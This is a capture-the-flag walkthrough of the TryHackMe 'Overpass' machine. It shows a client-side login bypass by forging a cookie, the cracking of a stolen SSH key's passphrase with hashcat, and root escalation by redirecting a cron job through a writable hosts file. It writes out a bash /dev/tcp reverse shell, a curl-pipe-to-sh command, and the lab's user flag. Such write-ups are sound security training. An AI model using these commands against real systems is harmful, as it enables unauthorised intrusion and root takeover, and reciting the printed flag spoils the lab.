
TryHackMe - Overpass


Description

What happens when a group of broke Computer Science students try to make a password manager?

Obviously a perfect commercial success!

Enumeration

Nmap Scan

nmap -p- -T5 $IP

Nmap scan report for 10.10.88.227
Host is up (0.19s latency).
Not shown: 64807 closed tcp ports (conn-refused), 726 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Dirbuster Scan

Dirbuster Scan: Administrator Page found!

Looks like there is a route to http://10.10.88.227/admin.html.

Inspecting the sources (login.js), we can see the vulnerable code block:

Vulnerable Code Block: Look at the `else` block

The if/else only checks whether the body of the POST response is the string "Incorrect Credentials"; any other response body is treated as a valid session and written into a SessionToken cookie. So we can modify the response in Burp Suite to force the creation of that cookie, or simply create one ourselves.

Burpsuite Intercept

Burpsuite: Modify Burpsuite Response

Intercepting the login request, we choose in the UI to also intercept the response to this request:

Burpsuite: Response to this request

After forwarding the request, the intercepted response can be edited before it reaches the browser:

Burpsuite: Modified Request

We can then refresh the page in Burp Suite's browser and find that we are logged in!

Overpass: Successful Login!

We can see that a SessionToken cookie has been created in the browser:

Burpsuite: Modified Session Key

The admin page shows what looks like an SSH RSA private key. We might be able to use it to SSH in as james.

SSH

Saving the key as james.key (and restricting its permissions with `chmod 600 james.key`, since ssh refuses keys readable by others), I tried:

ssh -i james.key james@$IP

I get the following response:

SSH: SSH Requires a passphrase

Cracking the SSH key passphrase

I first used ssh2john to convert the key into a crackable hash:

ssh2john james.key > james.key.hash

I removed the `james.key:` filename prefix that ssh2john puts at the start of the hash line, and used hashcat to identify the hash mode to crack it with:

SSH: Hash Generation and Identification

I then used hashcat to crack the hash with the rockyou wordlist:

hashcat -m 22931 james.key.hash /usr/share/wordlists/rockyou.txt

SSH: Cracked Key!

Passphrase: james13

Login attempt

Using the same command, I SSH'd into the machine with the key and the cracked passphrase:

SSH: Successful Login with the passphrase!

We got the user flag:

thm{65c1aaf000506e56996822c6281e6bf7}

Privilege Escalation

Using LinPEAS, we can find possible routes to privilege escalation. Following a tutorial, I started a web server on the attacking machine and fetched the script from the victim with curl:

curl http://$HOST_IP/linpeas.sh | sh

Crontab

Linpeas: Crontab

The final line of the crontab runs as root: it downloads a bash script from overpass.thm and executes it.

Hosts File

Linpeas: Host File

The hosts file is writable by everyone. So I can change the overpass.thm entry in /etc/hosts to point at the attacking machine, and the cron job will fetch, and run as root, a malicious script from there.

Escalation Process

On the attacking machine, we first create the directory layout and buildscript.sh that the cron job's request path expects:

mkdir -p downloads/src
vim downloads/src/buildscript.sh
# Contents of the file (replace HOST-IP with your own address, e.g. 10.17.101.177):
# #!/bin/bash
# bash -i >& /dev/tcp/HOST-IP/5555 0>&1

# Just in case (probably not required)
chmod +x downloads/src/buildscript.sh

and also started two servers (in separate terminals):

# Start the netcat listener (plain TCP, to match the /dev/tcp reverse shell)
nc -lvnp 5555

# Python 3 HTTP server, run from the directory that contains downloads/
# sudo python3 -m http.server 80

# Python 2 HTTP server
sudo python2 -m SimpleHTTPServer 80

It doesn't seem like the Python 3 server works, so I used Python 2 with SimpleHTTPServer instead (more info later).

The script used was a bash reverse shell; following a tutorial, I created the file with this content:

#!/bin/bash

bash -i >& /dev/tcp/10.17.101.177/5555 0>&1

On the victim machine, I changed the overpass.thm entry in /etc/hosts to point at the attacking machine:

10.17.101.177 overpass.thm

Hosts File: Modified hosts file in victim machine

Then we wait: the script is executed when the cron job next runs and fetches it.

Python Web Server: Python3 doesn't seem to work

After a few seconds, we get a reverse shell running as root. The root.txt flag is in the current directory, so we can read it straight away:

Root: Root Flag!

WRITTEN BY
Devoalda
Technophile